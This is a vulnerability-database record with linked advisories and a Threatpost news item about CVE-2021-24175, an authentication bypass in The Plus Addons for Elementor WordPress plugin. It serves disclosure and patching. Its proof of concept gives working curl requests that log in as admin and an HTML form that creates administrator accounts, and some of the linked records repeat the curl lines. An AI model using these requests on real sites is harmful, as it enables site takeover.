The plugin was being actively exploited by malicious actors to bypass authentication, allowing unauthenticated users to log in as any user (including admin) by just providing the related username, as well as to create accounts with arbitrary roles, such as admin. These issues can be exploited even if registration is disabled and the Login widget is not active. The vendor was notified by the two reporters:
- On March 6th, 2021 by Seravo, which was answered on March 7th, and the vulnerability acknowledged on March 9th.
- On March 7th and 8th, 2021 by WP Charged, who saw the attacks start on March 5th, 2021.
We (WPScanTeam) escalated the issues to Envato on March 8th, 2021 after confirming them and finding another similar auth-bypass issue. The free version of the plugin on the WordPress repository did not seem affected by this issue.
{"id": "WPEX-ID:C311FEEF-7041-4C21-9525-132B9BD32F89", "type": "wpexploit", "bulletinFamily": "exploit", "title": "The Plus Addons for Elementor Page Builder < 4.1.7 - Authentication Bypass", "description": "The plugin was being actively exploited to by malicious actors to bypass authentication, allowing unauthenticated users to log in as any user (including admin) by just providing the related username, as well as create accounts with arbitrary roles, such as admin. These issues can be exploited even if registration is disabled, and the Login widget is not active. The vendor was notified by the two reporters: \\- On March 6th, 2021 by Seravo, which was answered on March 7th, and the vulnerability acknowledged on March 9th. \\- On March 7th and 8th 2021 by WP Charged who saw the attacks start on March 5th, 2021. We (WPScanTeam) escalated to issues to Envato on Match 8th, 2021 after confirming them and finding another similar authbypass issue. The free version of the plugin on the WordPress repository did not seem affected by this issue.\n", "published": "2021-03-08T00:00:00", "modified": "2021-04-03T09:53:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Ville Korhonen (Seravo), Antony Booker (WP Charged)", "references": ["https://www.wordfence.com/blog/2021/03/critical-0-day-in-the-plus-addons-for-elementor-allows-site-takeover/", "https://posimyth.ticksy.com/ticket/2713734/"], "cvelist": ["CVE-2021-24175"], "immutableFields": [], "lastseen": "2021-04-12T11:32:19", "viewCount": 382, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:51B6F576-3F28-4977-82BF-F5BC5E6CC416"]}, {"type": "cve", "idList": ["CVE-2021-24175"]}, {"type": "seebug", "idList": ["SSV:99153"]}, {"type": "threatpost", "idList": ["THREATPOST:059ED7CDE9826DBE7FAE383816F90925"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:C311FEEF-7041-4C21-9525-132B9BD32F89"]}], "rev": 4}, "score": {"value": 5.5, "vector": "NONE"}, 
"backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:51B6F576-3F28-4977-82BF-F5BC5E6CC416"]}, {"type": "cve", "idList": ["CVE-2021-24175"]}, {"type": "seebug", "idList": ["SSV:99153"]}, {"type": "threatpost", "idList": ["THREATPOST:059ED7CDE9826DBE7FAE383816F90925"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:C311FEEF-7041-4C21-9525-132B9BD32F89"]}]}, "exploitation": null, "vulnersScore": 5.5}, "sourceData": "The \"theplus_ajax_login\" and \"theplus_google_ajax_register\" AJAX actions, available to unauthenticated users allow trivial authentication bypass as any user by only providing the related username\r\n\r\ncurl -X POST --data action=theplus_ajax_login --data email=admin -iLSS https://example.com/wp-admin/admin-ajax.php\r\ncurl -X POST --data action=theplus_google_ajax_register --data email=admin --data nonce=a -iLSS https://example.com/wp-admin/admin-ajax.php\r\n\r\nThen, the \"theplus_google_ajax_register\" AJAX action can also allow any unauthenticated user to create accounts with arbitrary role, such as admin, and then get logged in automatically\r\n\r\n<form method=\"POST\" action=\"https://example.com/wp-admin/admin-ajax.php\">\r\n<input value=\"newadmin\" name=\"name\" type=\"text\">\r\n<input value=\"test@example.com\" name=\"email\" type=\"text\">\r\n<input value=\"test\" name=\"password\" type=\"text\">\r\n<input value=\"theplus_google_ajax_register\" name=\"action\" type=\"text\">\r\n<input value=\"administrator\" name=\"tp_user_reg_role\" type=\"text\">\r\n<input value=\"any\" name=\"nonce\" type=\"text\">\r\n<input type=\"submit\" />\r\n</form>\r\n\r\nFinally, the \"theplus_ajax_register\" AJAX action can also allow unauthenticated user to create accounts with arbitrary role, such as admin, however this require the registration to be enabled, and the Login widget to be used.", "generation": 1, "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645814087}}
{"threatpost": [{"lastseen": "2021-03-10T20:35:00", "description": "The Plus Addons for Elementor plugin for WordPress has a critical security vulnerability that attackers can exploit to quickly, easily and remotely take over a website. First reported as a zero-day bug, researchers said it\u2019s being actively attacked in the wild.\n\nThe plugin, which has more than [30,000 active installations](<https://theplusaddons.com/>) according to its developer, allows site owners to create various user-facing widgets for their websites, including user logins and registration forms that can be added to an Elementor page. Elementor is a site-building tool for WordPress.\n\nThe bug (CVE-2021-24175) is a privilege-escalation and authentication-bypass issue that exists in this registration form function of the Plus Addons for Elementor. It rates 9.8 on the CVSS vulnerability scale, making it critical in severity.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cUnfortunately, this functionality was improperly configured and allowed attackers to register as an administrative user, or to log in as an existing administrative user,\u201d according to researchers at Wordfence, [in a posting](<https://www.wordfence.com/blog/2021/03/critical-0-day-in-the-plus-addons-for-elementor-allows-site-takeover/>) this week. 
They added that it arises from broken session management, but didn\u2019t provide further technical details.\n\n## Exploited as a Zero-Day Bug\n\nThe bug was first [reported to WPScan](<https://wpscan.com/vulnerability/c311feef-7041-4c21-9525-132b9bd32f89?__cf_chl_jschl_tk__=ec28e8a4f8fe37914316167d271861934062bb23-1615404898-0-AYaSxdWbcsd7306BlOBQW2-M0-8votr9xP1w6ZyWxrD972XOy_vz65QZ1omEHlky0kfPd1XotRla_ObNaEJbuKfJHajX81cOOEd-fatHUltblYTkfSkfBXOR1MCggkjhk1RsyZqqvEJg-sur0wGRVinhXRMGxCJ591nPXjM2kof4gpHWOdVyN2lyntep9rrh-TKwYxgTAiLV2gBG9ZXQY3M8_eQakjNY36raLrroDsBNqRaWGmnCTF9DXORUr7zC8EnkDWDPOubIf1qIn6j-daMph5DQL4tcVcv1d_-_OoFnqh9CBTV-BYz-Zx7neV8EALxOfdNnwtH2vO6_WN_Rwrk6tUf9OjRK7bK5Mh6gHei-LZ9jNonq9yNtqO1zXgBMP_s79VVx7cfryu3zufECoYywdJe18q0dJEAMpmy0M7vD7nLFnYe5wqbOf6ax51VI7Q>) by Seravo, a web-hosting company, as a zero-day under active attack by cybercriminals.\n\n\u201cThe plugin is being actively exploited to by malicious actors to bypass authentication, allowing unauthenticated users to log in as any user (including admin) by just providing the related username, as well as create accounts with arbitrary roles, such as admin,\u201d according to WPScan\u2019s overview.\n\nAs for how cybercriminals are using the exploit in the wild, Wordfence noted that indicators of compromise point to attackers creating privileged accounts and then using them to further compromise the site.\n\n\u201cWe believe that attackers are adding user accounts with usernames as the registered email address based on how the vulnerability creates user accounts, and in some cases installing a malicious plugin labeled \u2018wpstaff,'\u201d researchers said.\n\nWorryingly, they added that the vulnerability can still be exploited even if there\u2019s no active login or registration page that was created with the plugin, and even if registration and logins are suspended or disabled.\n\n\u201cThis means that any site running this plugin is vulnerable to compromise,\u201d according to the Wordfence 
posting.\n\n## **How to Fix the Plus Addons for Elementor Security Vulnerability**\n\nThe vulnerability was reported on Monday, and fully patched a day later. Site admins should upgrade to version 4.1.7 of The Plus Addons for Elementor to avoid compromise, and they should check for \u201cany unexpected administrative users or plugins you did not install,\u201d according to Wordfence. The Plus Addons for Elementor Lite does not contain the same vulnerability, the firm added.\n\n\u201cIf you are using The Plus Addons for Elementor plugin, we strongly recommend that you deactivate and remove the plugin completely until this vulnerability is patched,\u201d researchers said. \u201cIf the free version will suffice for your needs, you can switch to that version for the time being.\u201d\n\n## **WordPress Plugin Problems Persist**\n\nWordPress plugins continue to offer an attractive avenue of attack for cybercriminals.\n\nIn January,[ researchers warned of two vulnerabilities](<https://threatpost.com/orbit-fox-wordpress-plugin-bugs/163020/>) (one critical) in a WordPress plugin called Orbit Fox that could allow attackers to inject malicious code into vulnerable websites and/or take control of a website.\n\nAlso that month, a plugin called PopUp Builder, used by WordPress websites for building pop-up ads for newsletter subscriptions, [was found to have a vulnerability](<https://threatpost.com/wordpress-pop-up-builder-plugin-flaw-plagues-200k-sites/163500/>) could be exploited by attackers to send out newsletters with custom content, or to delete or import newsletter subscribers.\n\nAnd in February, an unpatched, stored cross-site scripting (XSS) security bug [was found to](<https://threatpost.com/unpatched-wordpress-plugin-code-injection/163706/>) potentially affect 50,000 Contact Form 7 Style plugin users.\n\n**_Check out our free [upcoming live webinar events](<https://threatpost.com/category/webinars/>) \u2013 unique, dynamic discussions with cybersecurity experts and 
the Threatpost community:_**\n\n * March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly **([Learn more and register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>))\n * April 21: **Underground Markets: A Tour of the Dark Economy **([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "cvss3": {}, "published": "2021-03-10T20:25:47", "type": "threatpost", "title": "Cyberattackers Exploiting Critical WordPress Plugin Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-24175"], "modified": "2021-03-10T20:25:47", "id": "THREATPOST:059ED7CDE9826DBE7FAE383816F90925", "href": "https://threatpost.com/cyberattackers-exploiting-critical-wordpress-plugin-bug/164663/", "cvss": {"score": 0.0, "vector": "NONE"}}], "seebug": [{"lastseen": "2021-07-24T16:15:00", "description": "", "cvss3": {}, "published": "2021-03-10T00:00:00", "type": "seebug", "title": "WordPress The Plus Addons for Elementor\u63d2\u4ef6\u8eab\u4efd\u9a8c\u8bc1\u7ed5\u8fc7\u6f0f\u6d1e\uff08CVE-2021-24175\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-24175"], "modified": "2021-03-10T00:00:00", "id": "SSV:99153", "href": "https://www.seebug.org/vuldb/ssvid-99153", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2022-06-21T08:02:55", "description": "The Plus Addons for Elementor Page Builder WordPress plugin before 4.1.7 was being actively exploited to by malicious actors to bypass authentication, allowing unauthenticated users to log in as any user (including admin) by just providing the related username, as well as create accounts with arbitrary roles, such as admin. 
These issues can be exploited even if registration is disabled, and the Login widget is not active.\n\n \n**Recent assessments:** \n \n**dorpor412** at March 10, 2021 8:27am UTC reported:\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-05T00:00:00", "type": "attackerkb", "title": "CVE-2021-24175", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24175"], "modified": "2021-04-10T00:00:00", "id": "AKB:51B6F576-3F28-4977-82BF-F5BC5E6CC416", "href": "https://attackerkb.com/topics/6VgynJ2CM2/cve-2021-24175", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "patchstack": [{"lastseen": "2022-06-01T19:33:11", "description": "Privilege Escalation vulnerability found by Ville Korhonen in WordPress The Plus Addons for Elementor premium plugin (versions <= 4.1.6).\n\n## Solution\n\n\r\n Update the WordPress The Plus Addons for Elementor premium plugin to the latest available version (at least 4.1.7)\r\n ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-08T00:00:00", "type": "patchstack", "title": "WordPress The Plus Addons for Elementor premium plugin <= 4.1.6 - Privilege Escalation vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24175"], "modified": "2021-03-08T00:00:00", "id": "PATCHSTACK:DCA51209E4283F955EAF8E233CE08547", "href": "https://patchstack.com/database/vulnerability/theplus-elementor-addon/wordpress-the-plus-addons-for-elementor-premium-plugin-4-1-6-privilege-escalation-vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "wpvulndb": [{"lastseen": "2021-04-12T11:32:19", "description": "The plugin was being actively exploited to by malicious actors to bypass authentication, allowing unauthenticated users to log in as any user (including admin) by just providing the related username, as well as create accounts with arbitrary roles, such as admin. These issues can be exploited even if registration is disabled, and the Login widget is not active. The vendor was notified by the two reporters: \\- On March 6th, 2021 by Seravo, which was answered on March 7th, and the vulnerability acknowledged on March 9th. 
\\- On March 7th and 8th 2021 by WP Charged who saw the attacks start on March 5th, 2021. We (WPScanTeam) escalated to issues to Envato on Match 8th, 2021 after confirming them and finding another similar authbypass issue. The free version of the plugin on the WordPress repository did not seem affected by this issue.\n\n### PoC\n\nThe \"theplus_ajax_login\" and \"theplus_google_ajax_register\" AJAX actions, available to unauthenticated users allow trivial authentication bypass as any user by only providing the related username curl -X POST --data action=theplus_ajax_login --data email=admin -iLSS https://example.com/wp-admin/admin-ajax.php curl -X POST --data action=theplus_google_ajax_register --data email=admin --data nonce=a -iLSS https://example.com/wp-admin/admin-ajax.php Then, the \"theplus_google_ajax_register\" AJAX action can also allow any unauthenticated user to create accounts with arbitrary role, such as admin, and then get logged in automatically Finally, the \"theplus_ajax_register\" AJAX action can also allow unauthenticated user to create accounts with arbitrary role, such as admin, however this require the registration to be enabled, and the Login widget to be used.\n", "cvss3": {}, "published": "2021-03-08T00:00:00", "type": "wpvulndb", "title": "The Plus Addons for Elementor Page Builder < 4.1.7 - Authentication Bypass", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-24175"], "modified": "2021-04-03T09:53:00", "id": "WPVDB-ID:C311FEEF-7041-4C21-9525-132B9BD32F89", "href": "https://wpscan.com/vulnerability/c311feef-7041-4c21-9525-132b9bd32f89", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T14:48:38", "description": "The Plus Addons for Elementor Page Builder WordPress plugin before 4.1.7 was being actively exploited to by malicious actors to bypass authentication, allowing unauthenticated users to log in as any user (including admin) by just providing the 
related username, as well as create accounts with arbitrary roles, such as admin. These issues can be exploited even if registration is disabled, and the Login widget is not active.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-05T19:15:00", "type": "cve", "title": "CVE-2021-24175", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24175"], "modified": "2021-04-09T17:22:00", "cpe": [], "id": "CVE-2021-24175", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24175", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}]}